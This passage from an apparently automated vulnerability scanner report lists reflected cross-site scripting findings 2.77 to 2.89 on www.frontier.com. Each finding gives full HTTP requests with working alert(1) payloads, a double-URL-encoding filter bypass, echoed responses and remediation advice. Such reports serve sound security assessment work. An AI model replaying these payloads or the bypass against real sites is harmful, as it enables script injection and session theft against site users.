<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.cssaeffb';alert(1)//9b1214b2e90');//]]> ...[SNIP]...
2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a38%2527%253balert%25281%2529%252f%252f6b3936757b1 was submitted in the REST URL parameter 1. This input was echoed as 34a38';alert(1)//6b3936757b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e116734a38%2527%253balert%25281%2529%252f%252f6b3936757b1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e116734a38';alert(1)//6b3936757b1');//]]> ...[SNIP]...
2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476a4'%3balert(1)//9376138f416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 476a4';alert(1)//9376138f416 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167?476a4'%3balert(1)//9376138f416=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167?476a4';alert(1)//9376138f416=1');//]]> ...[SNIP]...
2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 was submitted in the REST URL parameter 1. This input was echoed as 9f242';alert(1)//a3ed4687c09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e11679f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e11679f242';alert(1)//a3ed4687c09');//]]> ...[SNIP]...
2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0230'%3balert(1)//e42e942ef78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0230';alert(1)//e42e942ef78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167?a0230'%3balert(1)//e42e942ef78=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e1167?a0230';alert(1)//e42e942ef78=1');//]]> ...[SNIP]...
2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Controls/SharedWebMethods.aspx/GetCurrentLocale
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a972%2527%253balert%25281%2529%252f%252f878740809af was submitted in the REST URL parameter 2. This input was echoed as 4a972';alert(1)//878740809af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
POST /Controls/SharedWebMethods.aspx4a972%2527%253balert%25281%2529%252f%252f878740809af/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/SharedWebMethods.aspx4a972';alert(1)//878740809af/GetCurrentLocale');//]]> ...[SNIP]...
2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.frontier.com
Path: /Controls/VirtualCode.ashx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7979'%3bfb5ed37a6ba was submitted in the REST URL parameter 1. This input was echoed as f7979';fb5ed37a6ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Controlsf7979'%3bfb5ed37a6ba/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsf7979';fb5ed37a6ba/VirtualCode.ashx');//]]> ...[SNIP]...
2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Controls/VirtualCode.ashx
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb66e%2527%253balert%25281%2529%252f%252f3775dfb9153 was submitted in the REST URL parameter 2. This input was echoed as cb66e';alert(1)//3775dfb9153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Controls/VirtualCode.ashxcb66e%2527%253balert%25281%2529%252f%252f3775dfb9153?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/VirtualCode.ashxcb66e';alert(1)//3775dfb9153?pageid=73&origPath=/topNav.css/');//]]> ...[SNIP]...
2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Images/Common/form_bg.gif
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d86%2527%253balert%25281%2529%252f%252f44493412d91 was submitted in the REST URL parameter 1. This input was echoed as c3d86';alert(1)//44493412d91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Imagesc3d86%2527%253balert%25281%2529%252f%252f44493412d91/Common/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Imagesc3d86';alert(1)//44493412d91/Common/form_bg.gif');//]]> ...[SNIP]...
2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Images/Common/form_bg.gif
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7 was submitted in the REST URL parameter 2. This input was echoed as 80d1c';alert(1)//47a4aeee6e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/Common80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common80d1c';alert(1)//47a4aeee6e7/form_bg.gif');//]]> ...[SNIP]...
2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Images/Common/form_bg.gif
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 was submitted in the REST URL parameter 3. This input was echoed as 970f4';alert(1)//f20c2fa2242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/Common/form_bg.gif970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif970f4';alert(1)//f20c2fa2242');//]]> ...[SNIP]...
2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /Images/Common/form_bg.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56f6'%3balert(1)//227d16cdf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b56f6';alert(1)//227d16cdf97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Images/Common/form_bg.gif?b56f6'%3balert(1)//227d16cdf97=1 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif?b56f6';alert(1)//227d16cdf97=1');//]]> ...[SNIP]...
2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /yahoo/fpsearchlg.asp
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17124%2527%253balert%25281%2529%252f%252fdf531ca5181 was submitted in the REST URL parameter 1. This input was echoed as 17124';alert(1)//df531ca5181 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo17124%2527%253balert%25281%2529%252f%252fdf531ca5181/fpsearchlg.asp?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo17124';alert(1)//df531ca5181/fpsearchlg.asp?type=biz');//]]> ...[SNIP]...
2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /yahoo/fpsearchlg.asp
